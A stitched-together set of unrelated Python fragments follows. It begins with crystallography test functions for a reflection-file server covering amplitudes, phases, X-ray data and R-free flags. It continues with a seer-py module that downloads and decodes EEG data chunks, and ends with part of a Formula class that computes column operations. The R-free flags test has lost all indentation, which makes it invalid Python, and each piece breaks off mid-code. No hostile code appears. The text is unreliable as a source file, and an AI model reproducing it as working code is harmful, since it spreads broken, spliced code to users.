  mtz_dataset.add_miller_array(
    miller_array=miller_set.array(
      data=flex.random_double(size=miller_set.indices().size()),
      sigmas=flex.random_double(size=miller_set.indices().size())/10)
        .set_observation_type_xray_intensity(),
    column_root_label="F3")
  mtz_dataset.add_miller_array(
    miller_array=miller_set.array(
      data=flex.hendrickson_lattman(miller_set.indices().size(), (0,0,0,0))),
    column_root_label="P")
  mtz_dataset.mtz_object().write("tmp_rfu3.mtz")
  reflection_files = [reflection_file_reader.any_reflection_file(
    file_name="tmp_rfu3.mtz")]
  err = StringIO()
  reflection_file_srv = reflection_file_server(
    crystal_symmetry=crystal_symmetry,
    force_symmetry=True,
    reflection_files=reflection_files,
    err=err)
  # complex array: returned as-is unless conversion is requested
  ampl = reflection_file_srv.get_amplitudes(
    file_name=None,
    labels=["f2"],
    convert_to_amplitudes_if_necessary=False,
    parameter_scope="amplitudes",
    parameter_name="labels")
  assert str(ampl.info()) == "tmp_rfu3.mtz:F2,PHIF2"
  assert ampl.is_complex_array()
  ampl = reflection_file_srv.get_amplitudes(
    file_name=None,
    labels=["f2"],
    convert_to_amplitudes_if_necessary=True,
    parameter_scope="amplitudes",
    parameter_name="labels")
  assert str(ampl.info()) == "tmp_rfu3.mtz:F2"
  assert ampl.is_real_array()
  # intensity array: conversion appends as_amplitude_array to the info label
  ampl = reflection_file_srv.get_amplitudes(
    file_name=None,
    labels=["f3"],
    convert_to_amplitudes_if_necessary=False,
    parameter_scope="amplitudes",
    parameter_name="labels")
  assert str(ampl.info()) == "tmp_rfu3.mtz:F3,SIGF3"
  assert ampl.is_xray_intensity_array()
  ampl = reflection_file_srv.get_amplitudes(
    file_name=None,
    labels=["f3"],
    convert_to_amplitudes_if_necessary=True,
    parameter_scope="amplitudes",
    parameter_name="labels")
  assert str(ampl.info()) == "tmp_rfu3.mtz:F3,as_amplitude_array"
  assert ampl.is_real_array()
  # strict mode returns only true amplitude arrays (no intensities/complex)
  ampl = reflection_file_srv.get_amplitudes(
    file_name=None,
    labels=None,
    convert_to_amplitudes_if_necessary=False,
    parameter_scope="amplitudes",
    parameter_name="labels",
    return_all_valid_arrays=True,
    strict=True)
  assert (len(ampl) == 2)
  for f in ampl :
    assert (not f.is_xray_intensity_array()) and (not f.is_complex_array())
  #
  # phase extraction: complex arrays may be returned as-is or reduced to
  # the phase component
  phases = reflection_file_srv.get_phases_deg(
    file_name=None,
    labels=["f2"],
    convert_to_phases_if_necessary=False,
    original_phase_units=None,
    parameter_scope="phases",
    parameter_name="labels")
  assert str(phases.info()) == "tmp_rfu3.mtz:F2,PHIF2"
  assert phases.is_complex_array()
  phases = reflection_file_srv.get_phases_deg(
    file_name=None,
    labels=["f2"],
    convert_to_phases_if_necessary=True,
    original_phase_units=None,
    parameter_scope=None,
    parameter_name="labels")
  assert str(phases.info()) == "tmp_rfu3.mtz:PHIF2"
  assert phases.is_real_array()
  # random phases in degrees should average well above 5
  assert flex.mean(phases.data()) > 5
  # Hendrickson-Lattman coefficients, optionally converted to centroid phases
  phases = reflection_file_srv.get_phases_deg(
    file_name=None,
    labels=["PA"],
    convert_to_phases_if_necessary=False,
    original_phase_units=None,
    parameter_scope="phases",
    parameter_name="labels")
  assert str(phases.info()) == "tmp_rfu3.mtz:PA,PB,PC,PD"
  phases = reflection_file_srv.get_phases_deg(
    file_name=None,
    labels=["PA"],
    convert_to_phases_if_necessary=True,
    original_phase_units=None,
    parameter_scope="phases",
    parameter_name="labels")
  assert str(phases.info()) \
    == "tmp_rfu3.mtz:PA,PB,PC,PD,converted_to_centroid_phases"
  assert phases.is_real_array()
  # radian input is converted to degrees and flagged in the info label
  for original_phase_units in [None, "deg", "rad"]:
    phases = reflection_file_srv.get_phases_deg(
      file_name=None,
      labels=["F0"],
      convert_to_phases_if_necessary=False,
      original_phase_units=original_phase_units,
      parameter_scope=None,
      parameter_name="labels")
    if (original_phase_units != "rad"):
      assert str(phases.info()) == "tmp_rfu3.mtz:F0"
    else:
      assert str(phases.info()) == "tmp_rfu3.mtz:F0,converted_to_deg"
def exercise_get_xtal_data():
  """Exercise reflection_file_server.get_xray_data().

  Covers: unambiguous retrieval of an intensity+sigma array, the
  ambiguous and no-match Sorry error paths (checking the exact err-stream
  text), return_all_valid_arrays mode, lookup by file name (relative and
  absolute), and the prefer_anomalous switch that selects between
  anomalous and Bijvoet-merged data.

  Writes tmp_rfu1.mtz, tmp_rfu2.mtz and tmp_rfu3.mtz in the working
  directory as fixtures.
  """
  # build a P1 miller set and two random intensity arrays with sigmas
  crystal_symmetry = crystal.symmetry(
    unit_cell=(10,11,12,85,95,100),
    space_group_symbol="P 1")
  miller_set = miller.build_set(
    crystal_symmetry=crystal_symmetry,
    anomalous_flag=False,
    d_min=3)
  input_arrays = [miller_set.array(
    data=flex.random_double(size=miller_set.indices().size()),
    sigmas=flex.random_double(size=miller_set.indices().size())/10)
    .set_observation_type_xray_intensity()
      for i in [0,1]]
  # single-array file: lookup must succeed without labels
  mtz_dataset = input_arrays[0].as_mtz_dataset(column_root_label="F0")
  mtz_dataset.mtz_object().write("tmp_rfu1.mtz")
  reflection_files = [reflection_file_reader.any_reflection_file(
    file_name="tmp_rfu1.mtz")]
  reflection_file_srv = reflection_file_server(
    crystal_symmetry=crystal_symmetry,
    force_symmetry=True,
    reflection_files=reflection_files)
  f_obs = reflection_file_srv.get_xray_data(
    file_name=None,
    labels=None,
    ignore_all_zeros=False,
    parameter_scope="xray_data")
  assert str(f_obs.info()) == "tmp_rfu1.mtz:F0,SIGF0"
  # two-array file: lookup without labels is ambiguous and must raise Sorry
  mtz_dataset.add_miller_array(
    miller_array=input_arrays[1], column_root_label="F1")
  mtz_dataset.mtz_object().write("tmp_rfu2.mtz")
  reflection_files = [reflection_file_reader.any_reflection_file(
    file_name="tmp_rfu2.mtz")]
  err = StringIO()
  reflection_file_srv = reflection_file_server(
    crystal_symmetry=crystal_symmetry,
    force_symmetry=True,
    reflection_files=reflection_files,
    err=err)
  try:
    f_obs = reflection_file_srv.get_xray_data(
      file_name=None,
      labels=None,
      ignore_all_zeros=True,
      parameter_scope="xray_data")
  except Sorry:
    assert err.getvalue() == """\
Multiple equally suitable arrays of observed xray data found.
Possible choices:
  tmp_rfu2.mtz:F0,SIGF0
  tmp_rfu2.mtz:F1,SIGF1
Please use xray_data.labels
to specify an unambiguous substring of the target label.
"""
    err = reflection_file_srv.err = StringIO()
  else:
    raise Exception_expected
  # return_all_valid_arrays avoids the ambiguity by returning every match
  f_obs_list = reflection_file_srv.get_xray_data(
    file_name = None,
    labels = None,
    ignore_all_zeros=True,
    parameter_scope="xray_data",
    return_all_valid_arrays=True,
    minimum_score=1)
  assert len(f_obs_list) == 2
  # a full label list resolves the ambiguity
  f_obs = reflection_file_srv.get_xray_data(
    file_name=None,
    labels=["F1", "SIGF1"],
    ignore_all_zeros=True,
    parameter_scope="xray_data")
  assert str(f_obs.info()) == "tmp_rfu2.mtz:F1,SIGF1"
  # mixed labels from different arrays must not match anything
  try:
    f_obs = reflection_file_srv.get_xray_data(
      file_name=None,
      labels=["F1", "SIGF0"],
      ignore_all_zeros=True,
      parameter_scope="xray_data")
  except Sorry:
    assert err.getvalue() == """\
No matching array: xray_data.labels=F1 SIGF0
Possible choices:
  tmp_rfu2.mtz:F0,SIGF0
  tmp_rfu2.mtz:F1,SIGF1
Please use xray_data.labels
to specify an unambiguous substring of the target label.
"""
    err = reflection_file_srv.err = StringIO()
  else:
    raise Exception_expected
  # lookup by file name loads the additional file on demand
  assert len(reflection_file_srv.file_name_miller_arrays) == 1
  f_obs = reflection_file_srv.get_xray_data(
    file_name="tmp_rfu1.mtz",
    labels=None,
    ignore_all_zeros=True,
    parameter_scope="xray_data")
  assert len(reflection_file_srv.file_name_miller_arrays) == 2
  assert str(f_obs.info()) == "tmp_rfu1.mtz:F0,SIGF0"
  # absolute path and lower-case label substring must also match
  f_obs = reflection_file_srv.get_xray_data(
    file_name=os.path.abspath("tmp_rfu1.mtz"),
    labels=["sigf0"],
    ignore_all_zeros=True,
    parameter_scope="xray_data")
  assert len(reflection_file_srv.file_name_miller_arrays) == 2
  assert str(f_obs.info()) == "tmp_rfu1.mtz:F0,SIGF0"
  # without a file name the two-array file is still ambiguous
  try:
    f_obs = reflection_file_srv.get_xray_data(
      file_name=None,
      labels=None,
      ignore_all_zeros=True,
      parameter_scope="xray_data")
  except Sorry:
    assert err.getvalue() == """\
Multiple equally suitable arrays of observed xray data found.
Possible choices:
  tmp_rfu2.mtz:F0,SIGF0
  tmp_rfu2.mtz:F1,SIGF1
Please use xray_data.labels
to specify an unambiguous substring of the target label.
"""
    err = reflection_file_srv.err = StringIO()
  else:
    raise Exception_expected
  # test preference for anomalous (or merged) data
  miller_set = miller.build_set(
    crystal_symmetry=crystal_symmetry,
    anomalous_flag=True,
    d_min=3)
  i_obs = miller_set.array(
    data=flex.random_double(size=miller_set.indices().size()),
    sigmas=flex.random_double(size=miller_set.indices().size())/10
    ).set_observation_type_xray_intensity()
  i_mean = i_obs.average_bijvoet_mates()
  mtz_data = i_obs.as_mtz_dataset(column_root_label="I")
  mtz_data.add_miller_array(i_mean, column_root_label="I")
  mtz_data.mtz_object().write("tmp_rfu3.mtz")
  reflection_files = [reflection_file_reader.any_reflection_file(
    file_name="tmp_rfu3.mtz")]
  reflection_file_srv = reflection_file_server(
    crystal_symmetry=crystal_symmetry,
    force_symmetry=True,
    reflection_files=reflection_files)
  err = reflection_file_srv.err = StringIO()
  # without a preference the anomalous/merged pair is ambiguous
  try :
    i_obs = reflection_file_srv.get_xray_data(
      file_name=None,
      labels=None,
      ignore_all_zeros=False,
      parameter_scope="xray_data")
  except Sorry :
    pass
  # prefer_anomalous selects the unmerged or merged array respectively
  i_obs = reflection_file_srv.get_xray_data(
    file_name=None,
    labels=None,
    ignore_all_zeros=False,
    parameter_scope="xray_data",
    prefer_anomalous=True)
  assert (i_obs.info().label_string() == "I(+),SIGI(+),I(-),SIGI(-)")
  i_obs = reflection_file_srv.get_xray_data(
    file_name=None,
    labels=None,
    ignore_all_zeros=False,
    parameter_scope="xray_data",
    prefer_anomalous=False)
  assert (i_obs.info().label_string() == "I,SIGI")
def exercise_get_r_free_flags():
crystal_symmetry = crystal.symmetry(
unit_cell=(30,31,32,85,95,100),
space_group_symbol="P 1")
miller_set = miller.build_set(
crystal_symmetry=crystal_symmetry,
anomalous_flag=False,
d_min=3)
n = miller_set.indices().size()
exercise_flag_arrays = []
exercise_flag_arrays.append(
flex.int(list(flex.random_permutation(size=n)%10)))
exercise_flag_arrays.append(flex.int(range(n)))
exercise_flag_arrays.append(flex.int(n, 0))
for style in ["ccp4", "cns", "shelx", "bool"]:
for i_exercise,exercise_flag_array in enumerate(exercise_flag_arrays):
for reversed in [False, True]:
if (style == "ccp4"):
if (reversed): break
data = exercise_flag_array
test_flag_value = 3
else:
if (not reversed):
data = (exercise_flag_array == 0)
test_flag_value = True
else:
data = (exercise_flag_array != 0)
test_flag_value = False
if (style == "cns"):
data = data.as_int()
test_flag_value = int(test_flag_value)
elif (style == "shelx"):
data = -data.as_int()
data.set_selected((data == 0), 1)
if (not reversed): test_flag_value = -1
else: test_flag_value = 1
input_array = miller_set.array(data=data)
mtz_dataset = input_array.as_mtz_dataset(
column_root_label="FreeRflags")
mtz_dataset.mtz_object().write("tmp.mtz")
reflection_files = [reflection_file_reader.any_reflection_file(
file_name="tmp.mtz")]
err = StringIO()
reflection_file_srv = reflection_file_server(
crystal_symmetry=crystal_symmetry,
force_symmetry=True,
reflection_files=reflection_files,
err=err)
for trial_test_flag_value in [None, test_flag_value]:
for trial_label in [None, "free", "foo"]:
try:
r_free_flags, actual_test_flag_value = \
reflection_file_srv.get_r_free_flags(
file_name=None,
label=trial_label,
test_flag_value=trial_test_flag_value,
disable_suitability_test=False,
parameter_scope="r_free_flags")
except Sorry as e:
if (trial_label != "foo"):
assert i_exercise > 0
if (trial_label is None):
assert str(e) == """\
No array of R-free flags found.
For manual selection define:
r_free_flags.label
r_free_flags.test_flag_value
r_free_flags.disable_suitability_test=True"""
else:
assert str(e) == \
"Not a suitable array of R-free flags:" \
+ " r_free_flags.label=free\n" \
+ "To override the suitability test define:" \
+ " r_free_flags.disable_suitability_test=True"
else:
assert str(e) == "No matching array: r_free_flags.label=foo"
if (i_exercise == 0):
assert err.getvalue() == """\
No matching array: r_free_flags.label=foo
Possible choices:
tmp.mtz:FreeRflags
Please use r_free_flags.label
to specify an unambiguous substring of the target label.
"""
else:
assert err.getvalue() == """\
No matching array: r_free_flags.label=foo
"""
err = reflection_file_srv.err = StringIO()
else:
assert i_exercise == 0
actual_test_flag_value_2 = guess_r_free_flag_value(
miller_array=r_free_flags,
test_flag_value=trial_test_flag_value)
assert (actual_test_flag_value_2 == actual_test_flag_value)
for second_label in ["test", "foo"]:
input_array = miller_set.array(data=exercise_flag_arrays[0])
mtz_dataset = input_array.as_mtz_dataset(
column_root_label="FreeRflags")
mtz_dataset.add_miller_array(
miller_array=input_array,
column_root_label=second_label)
mtz_dataset.mtz_object().write("tmp.mtz")
reflection_files = [reflection_file_reader.any_reflection_file(
file_name="tmp.mtz")]
err = StringIO()
reflection_file_srv = reflection_file_server(
crystal_symmetry=crystal_symmetry,
force_symmetry=True,
reflection_files=reflection_files,
err=err)
try:
reflection_file_srv.get_r_free_flags(
file_name=None,
label=None,
test_flag_value=None,
disable_suitability_test=False,
parameter_scope="r_free_flags")
except Sorry as e:
assert str(e)=="Multiple equally suitable arrays of R-free flags found."
assert err.getvalue() == """\
Multiple equally suitable arrays of R-free flags found.
Possible choices:
tmp.mtz:FreeRflags
tmp.mtz:test
Please use r_free_flags.label
to specify an unambiguous substring of the target label.
"""
err = reflection_file_srv.err = StringIO()
else:
assert str(r_free_flags.info()) == "tmp.mtz:FreeRflags"
r_free_flags, actual_test_flag_value = \
reflection_file_srv.get_r_free_flags(
file_name=None,
label="FreeRflags",
test_flag_value=3,
disable_suitability_test=True,
parameter_scope="r_free_flags")
assert r_free_flags.info().label_string() == "FreeRflags"
assert actual_test_flag_value == 3
for label,test_flag_value in [(None,3), ("FreeRflags",None)]:
try:
reflection_file_srv.get_r_free_flags(
file_name=None,
label=label,
test_flag_value=test_flag_value,
disable_suitability_test=True,
parameter_scope="r_free_flags")
except Sorry as e:
assert str(e) == "r_free_flags.disable_suitability_test=True:" \
" Suitability test for R-free flags can only be disabled if both" \
" r_free_flags.label and r_free_flags.test_flag_value are defined."
else: raise Exception_expected
# test corrupted R-free flags
r_free_flags = miller_set.generate_r_free_flags()
int_flags = r_free_flags.data().as_int()
int_flags[100] = 10000000
r_free_flags = r_free_flags.customized_copy(data=int_flags)
mtz_dataset = r_free_flags.as_mtz_dataset(
column_root_label="TEST")
mtz_dataset.mtz_object().write("tmp.mtz")
reflection_files = [reflection_file_reader.any_reflection_file(
file_name="tmp.mtz")]
err = StringIO()
reflection_file_srv = reflection_file_server(
crystal_symmetry=crystal_symmetry,
force_symmetry=True,
reflection_files=reflection_files,
err=err)
flags, value = reflection_file_srv.get_r_free_flags(
| |
<reponame>seermedical/seer-py
"""
Utility and helper functions for downloading data, as well as plotting.
Copyright 2017 Seer Medical Pty Ltd, Inc. or its affiliates. All Rights Reserved.
"""
import functools
import gzip
import logging
import time
from multiprocessing import Pool
import os
import numpy as np
import pandas as pd
import requests
logger = logging.getLogger(__name__)
# pylint:disable=too-many-locals,too-many-statements
def download_channel_data(data_q, download_function):
    """
    Download data for a single segment, decompress if needed, convert to numeric type & apply
    exponentiation etc, and return as a DataFrame.

    Parameters
    ----------
    data_q : list of list
        A list containing 5 elements:
        - A row from a metadata DataFrame with fields including: a data chunk URL,
          timestamp, sample encoding, sample rate, compression, signal min/max
          exponent etc. See `get_channel_data` for series derivation
        - study_id : str
        - channel_group_id : str
        - segment_id : str
        - channel_names: list of str
    download_function : callable
        A function that will be used to attempt to download data from the URL
        defined in data_q[0]['dataChunks.url']

    Returns
    -------
    data_df : pd.DataFrame or None
        DataFrame with columns 'time', 'id', 'channelGroups.id', 'segments.id',
        and a column with data for each channel in channel_names.
        None if the chunk does not exist on the server (HTTP 404).
    """
    meta_data, study_id, channel_groups_id, segment_id, channel_names = data_q
    try:
        data = _get_data_chunk(study_id, meta_data, download_function)
        if data is None:
            # chunk URL returned a 404 - nothing to return for this chunk
            return None
        # interpret the raw bytes using the encoding recorded in the metadata
        data_type = meta_data['channelGroups.sampleEncoding']
        data = np.frombuffer(data, dtype=np.dtype(data_type))
        # work in float32 so missing samples can be represented as NaN below
        data = data.astype(np.float32)
        column_names = channel_names
        if meta_data['channelGroups.timestamped']:
            # timestamped data is not stored in records as EDF data is
            # it is just a sequence of (ts1, ch1, ch2, ..., chN), (ts2, ch1, ch2, ..., chN), ...
            # the timestamp is milliseconds relative to chunk start
            column_names = ['time'] + channel_names
            data = data.reshape(-1, len(column_names))
        else:
            try:
                # EDF data is in the format [record 1: (ch1 sample1, ch1 sample2, ..., ch1 sampleN),
                # (ch2 sample1, ch2 sample2, ..., ch2 sampleN), ...][record2: ...], ..., [recordN: ...]
                data = data.reshape(-1, len(channel_names),
                                    int(meta_data['channelGroups.samplesPerRecord']))
            # We have a catch for 'ValueError' when calling 'reshape',
            # because it is a known issue with some EDF files that have a duration
            # not evenly divisible by 1000 (i.e. not whole seconds) that were processed
            # by seer-worker before the relevant bug was fixed. That bug caused
            # those EDF files to be re-written with an extra record's worth
            # of samples, so if we chop the empty record of samples off the end
            # all should be right with the world.
            except ValueError:
                samples_per_record = int(meta_data['channelGroups.samplesPerRecord'])
                # For segments affected by the seer-worker bug mentioned above
                # that also had a sample count that didn't divide evenly
                # into the samplesPerRecord attribute, the logic that fills in
                # values to even out the sample counts would fill in extra samples
                # beyond the extra record's worth of samples as well. Since this
                # excess is not based on any known attributes of the channel group,
                # segment, or existing data files, we have to guess that excess samples
                # that don't divide evenly into samples_per_record are likely due
                # to the known bug and can be safely pruned.
                excess_samples = (len(data) % samples_per_record) + samples_per_record
                data = data[:-excess_samples].reshape(
                    -1, len(channel_names), int(meta_data['channelGroups.samplesPerRecord']))
            # reorder (record, channel, sample) -> (record, sample, channel) and
            # flatten the records so each row is a single time point
            data = np.transpose(data, (0, 2, 1))
            data = data.reshape(-1, data.shape[2])
            if 'int' in data_type:
                # EDF int format data encodes missing values as the minimum possible int value
                # first remove any minimum ints at the end of the data
                nan_mask = np.all(data == np.iinfo(np.dtype(data_type)).min, axis=1)
                if nan_mask[-1]:
                    # walk backwards from the end and drop the trailing run of
                    # all-missing rows only (internal gaps are kept for now)
                    nan_mask_corrected = np.ones(nan_mask.shape, dtype=bool)
                    for i in range(len(nan_mask) - 1, -1, -1):
                        if nan_mask[i]:
                            nan_mask_corrected[i] = False
                        else:
                            break
                    data = data[nan_mask_corrected]
                # now convert any internal minimum ints into nans
                data[np.all(data == np.iinfo(np.dtype(data_type)).min, axis=1), :] = np.nan
                # this converts the int values which are in a range between minimum int and maximum int,
                # into float values in a range between signalMin and signalMax
                chan_min = meta_data['channelGroups.signalMin'].astype(np.float64)
                chan_max = meta_data['channelGroups.signalMax'].astype(np.float64)
                chan_diff = chan_max - chan_min
                dig_min = np.iinfo(data_type).min
                dig_max = np.iinfo(data_type).max
                dig_diff = abs(dig_min) + abs(dig_max)
                # errstate guard: chan_diff or dig_diff could be zero for a
                # degenerate channel; the resulting NaN/inf is handled below
                with np.errstate(divide='ignore', invalid='ignore'):
                    data = (data - dig_min) / dig_diff * chan_diff + chan_min
        data = pd.DataFrame(data=data, index=None, columns=column_names)
        # apply the per-channel-group decimal exponent to get physical units
        exponent = meta_data['channelGroups.exponent'].astype(np.float64)
        data[channel_names] = data[channel_names] * 10.0**exponent
        # NOTE(review): ffill/bfill run along axis='columns', i.e. a missing
        # sample is filled from the neighbouring *channel* in the same row,
        # not from the previous time point - confirm this is intended
        data = data.fillna(method='ffill', axis='columns')
        data = data.fillna(method='bfill', axis='columns')
        data = data.fillna(value=0., axis='columns')
        if meta_data['channelGroups.timestamped']:
            # data timestamp is relative to chunk start
            # make sure both are float64 - sometimes mixed float arithmetic gives strange results
            data['time'] = (data['time'].astype(np.float64)
                            + meta_data['dataChunks.time'].astype(np.float64))
        else:
            # no per-sample timestamps: synthesise them from the sample rate
            # (in ms) offset by the chunk start time
            data['time'] = (np.arange(data.shape[0]) *
                            (1000.0 / meta_data['channelGroups.sampleRate'])
                            + meta_data['dataChunks.time'])
        # attach identifying columns and order them ahead of the channel data
        data['id'] = study_id
        data['channelGroups.id'] = channel_groups_id
        data['segments.id'] = segment_id
        data = data[['time', 'id', 'channelGroups.id', 'segments.id'] + channel_names]
        # chunks are all the same size for a given channel group (usually 10s)
        # if they don't contain that much data they are padded out
        # this discards any padding at the end of a segment before the data is returned
        segment_end = meta_data['segments.startTime'] + meta_data['segments.duration']
        data = data[data['time'] < segment_end]
        return data
    except Exception as ex:
        # log full context before re-raising so failures in worker pools are traceable
        logger.error(f"{repr(ex)}:\nstudy_id: {study_id}\nchannel_names: {channel_names}\n"
                     f"dataChunks.url: {meta_data['dataChunks.url']}\ndataChunks.time: "
                     f"{meta_data['dataChunks.time']:.2f}\nmeta_data: {meta_data}")
        raise
def _get_data_chunk(study_id, meta_data, download_function):
"""
Internal function. Download a single chunk of data and decompress if needed. If the supplied
download_function is compatabile with requests.get, it will retry if certain recoverable errors
are encountered (500, 503), or will return None if a 404 error is encountered.
Parameters
----------
study_id : str
The id of the study the data chunk belongs to
meta_data : Dataframe
A metadata DataFrame with fields including: a data chunk URL, timestamp, sample encoding,
sample rate, compression, signal min/max, exponent etc. See `get_channel_data` for series
derivation
download_function : callable
A function that will be used to download data from the URL in meta_data['dataChunks.url']
Returns
-------
data : byte buffer
The data returned from the given URL by the given download_function, potentially
decompressed
"""
max_attempts = 3
for i in range(max_attempts):
response = download_function(meta_data['dataChunks.url'])
data = response.content
try:
status_code = response.status_code
except AttributeError:
break # the download function used does not return a status_code
try:
reason = response.reason
except AttributeError:
reason = 'unknown reason'
if status_code == 200:
break
logger.warning(f"download_channel_data(): {status_code} status code returned: {reason}\n"
f"response content {data}\nstudy_id: {study_id}\ndataChunks.url: "
f"{meta_data['dataChunks.url']}\ndataChunks.time: "
f"{meta_data['dataChunks.time']:.2f}\nmeta_data: {meta_data}")
if status_code == 404:
# we sometimes get chunk URLs which don't exist
logger.warning('The chunk requested does not exist')
return None
if status_code in (500, 503):
# S3 sometimes returns 500 or 503 if it's overwhelmed; retry
message = 'Unable to read chunk - most likely a performance error'
if i < (max_attempts - 1):
sleep_for = 2**(i + 1) # Just a tiny sleep
logger.info(f'{message} - sleeping for {sleep_for} then retrying')
time.sleep(sleep_for)
continue
logger.error(f'{message} - max attempts exceeded')
# throw an error for other status codes
raise requests.exceptions.HTTPError(f'HTTPError {status_code}')
try:
if meta_data['channelGroups.compression'] == 'gzip':
data = gzip.decompress(data)
except OSError:
pass
return data
# pylint:disable=too-many-locals
def create_data_chunk_urls(metadata, segment_urls, from_time=0, to_time=9e12):
    """
    Get URLs and timestamps for data chunks listed in a metadata DataFrame.

    Parameters
    ----------
    metadata : pd.DataFrame
        Study metadata as returned by seerpy.get_all_study_metadata_dataframe_by_*().
        Uses columns 'segments.id', 'channelGroups.chunkPeriod' (seconds),
        'segments.duration' (ms) and 'segments.startTime' (ms)
    segment_urls : pd.DataFrame
        DataFrame with columns 'segments.id', and 'baseDataChunkUrl', as returned
        by seerpy.get_segment_urls()
    from_time : float, optional
        Only include data chunks that end after this time
    to_time : float, optional
        Only include data chunks that start before this time

    Returns
    -------
    download_df : pd.DataFrame
        A DataFrame with columns 'segments.id', 'dataChunks.url' and 'dataChunks.time',
        which can be used to download data chunks in a segment
    """
    # chunk files are named by a zero-padded index plus the '.dat' suffix,
    # e.g. '00000000007.dat'; baseDataChunkUrl contains the index-0 pattern
    chunk_pattern = '00000000000.dat'
    chunk_suffix = chunk_pattern[-4:]
    index_width = len(chunk_pattern) - len(chunk_suffix)
    data_chunks = []
    # one metadata row per segment is enough to derive all of its chunk URLs
    metadata = metadata.drop_duplicates('segments.id').reset_index(drop=True)
    for _, row in metadata.iterrows():
        seg_base_urls = segment_urls.loc[segment_urls['segments.id'] == row['segments.id'],
                                         'baseDataChunkUrl']
        if seg_base_urls.empty:
            # no URL known for this segment; skip it
            continue
        seg_base_url = seg_base_urls.iloc[0]
        chunk_period = row['channelGroups.chunkPeriod']
        # segments.duration is in ms; round up so a partial final chunk is included
        num_chunks = int(np.ceil(row['segments.duration'] / chunk_period / 1000.))
        start_time = row['segments.startTime']
        chunk_period_ms = chunk_period * 1000
        for i in range(num_chunks):
            chunk_start_time = chunk_period_ms * i + start_time
            next_chunk_start_time = chunk_period_ms * (i + 1) + start_time
            # keep only chunks that overlap the requested [from_time, to_time) window
            if chunk_start_time < to_time and next_chunk_start_time > from_time:
                data_chunk_name = str(i).zfill(index_width) + chunk_suffix
                data_chunk_url = seg_base_url.replace(chunk_pattern, data_chunk_name)
                data_chunks.append([row['segments.id'], data_chunk_url, chunk_start_time])
    return pd.DataFrame.from_records(data_chunks,
                                     columns=['segments.id', 'dataChunks.url', 'dataChunks.time'])
# pylint:disable=too-many-locals,too-many-arguments
def get_channel_data(study_metadata, segment_urls, download_function=requests.get, threads=None,
from_time=0, to_time=9e12):
"""
Download data chunks and stitch together into a | |
operator, var_right)] = {}
elif is_numeric_str(var_left):
if type(var_right) == Data:
for v_right in var_right.variables():
res[Formula.__name_data(var_left, operator, v_right)] = {}
elif is_numeric_str(var_right):
res[Formula.__name_data(var_left, operator, var_right)] = {}
else:
variable_right = Variable.from_data(
data, var_right)
if variable_right.type == Variable_Types.categorical:
vals_right = variable_right.values(Sample(data))[:-1] if skip_collinear else variable_right.values(Sample(data))
for val_right in vals_right:
res[Formula.__name_data(var_left, operator, f'{var_right}={val_right}')] = {}
elif variable_right.type == Variable_Types.numeric:
res[Formula.__name_data(var_left, operator, var_right)] = {}
else:
if var_left in data.variables(): # var_left == variable in sample
variable_left = Variable.from_data(data, var_left)
if variable_left.type == Variable_Types.categorical:
vals_left = variable_left.values(Sample(data))[:-1] if skip_collinear else variable_left.values(Sample(data))
if type(var_right) == Data:
for val_left in vals_left:
for v_right in var_right.values:
res[Formula.__name_data(f'({var_left}={val_left})', operator, v_right)] = {}
elif is_numeric_str(var_right):
for val_left in vals_left:
res[Formula.__name_data(f'({var_left}={val_left})', operator, var_right)] = {}
else:
if var_right in data.variables(): # var_right == a variable in sample
variable_right = Variable.from_data(
data, var_right)
if variable_right.type == Variable_Types.categorical:
vals_right = variable_right.values(Sample(data))[:-1] if skip_collinear else variable_right.values(Sample(data))
for val_left in vals_left:
for val_right in vals_right:
res[Formula.__name_data(f'({var_left}={val_left})', operator, f'{var_right}={val_right}')] = {}
elif variable_right.type == Variable_Types.numeric:
for val_left in vals_left:
res[Formula.__name_data(f'({var_left}={val_left})', operator, var_right)] = {}
else: # var_right == a text value, operator == '=' or '!='
res[Formula.__name_data(var_left, operator, var_right)] = {}
elif variable_left.type == Variable_Types.numeric:
if type(var_right) == Data:
for v_right in var_right.values:
res[Formula.__name_data(var_left, operator, v_right)] = {}
elif is_numeric_str(var_right):
res[Formula.__name_data(var_left, operator, var_right)] = {}
else:
variable_right = Variable.from_data(
data, var_right)
if variable_right.type == Variable_Types.categorical:
vals_right = variable_right.values(Sample(data))[:-1] if skip_collinear else variable_right.values(Sample(data))
for val_right in vals_right:
res[Formula.__name_data(var_left, operator, f'({var_right}={val_right})')] = {}
elif variable_right.type == Variable_Types.numeric:
res[Formula.__name_data(var_left, operator, var_right)] = {}
else: # var_left == a text value
if type(var_right) == Data:
for v_right in var_right.variables():
res[Formula.__name_data(var_left, operator, v_right)] = {}
elif not is_numeric_str(var_right):
res[Formula.__name_data(var_left, operator, var_right)] = {}
## calculates
for i in data.index():
if type(var_left) == Data:
if type(var_right) == Data:
for v_left in var_left.values:
for v_right in var_right.values:
if operator == '+':
res[Formula.__name_data(v_left, operator, v_right)][i] = var_left.values[v_left][i] + \
var_right.values[v_right][i]
elif operator == '-':
res[Formula.__name_data(v_left, operator, v_right)][i] = var_left.values[v_left][i] - \
var_right.values[v_right][i]
elif operator == '*':
res[Formula.__name_data(v_left, operator, v_right)][i] = var_left.values[v_left][i] * \
var_right.values[v_right][i]
elif operator == '/':
if var_right.values[v_right][i] != 0:
res[Formula.__name_data(v_left, operator, v_right)][i] = var_left.values[v_left][i] / \
var_right.values[v_right][i]
else:
res[Formula.__name_data(v_left, operator, v_right)][i] = np.nan
elif operator == '^':
res[Formula.__name_data(v_left, operator, v_right)][i] = var_left.values[v_left][i] ** \
var_right.values[v_right][i]
elif np.isnan(var_left.values[v_left][i]) or np.isnan(var_right.values[v_right][i]):
res[Formula.__name_data(v_left, operator, v_right)][i] = np.nan
elif operator == '=':
if var_left.values[v_left][i] == var_right.values[v_right][i]:
res[Formula.__name_data(v_left, operator, v_right)][i] = 1
else:
res[Formula.__name_data(v_left, operator, v_right)][i] = 0
elif operator == '!=':
if var_left.values[v_left][i] != var_right.values[v_right][i]:
res[Formula.__name_data(v_left, operator, v_right)][i] = 1
else:
res[Formula.__name_data(v_left, operator, v_right)][i] = 0
elif operator == '<':
if var_left.values[v_left][i] < var_right.values[v_right][i]:
res[Formula.__name_data(v_left, operator, v_right)][i] = 1
else:
res[Formula.__name_data(v_left, operator, v_right)][i] = 0
elif operator == '>':
if var_left.values[v_left][i] > var_right.values[v_right][i]:
res[Formula.__name_data(v_left, operator, v_right)][i] = 1
else:
res[Formula.__name_data(v_left, operator, v_right)][i] = 0
elif operator == '<=':
if var_left.values[v_left][i] <= var_right.values[v_right][i]:
res[Formula.__name_data(v_left, operator, v_right)][i] = 1
else:
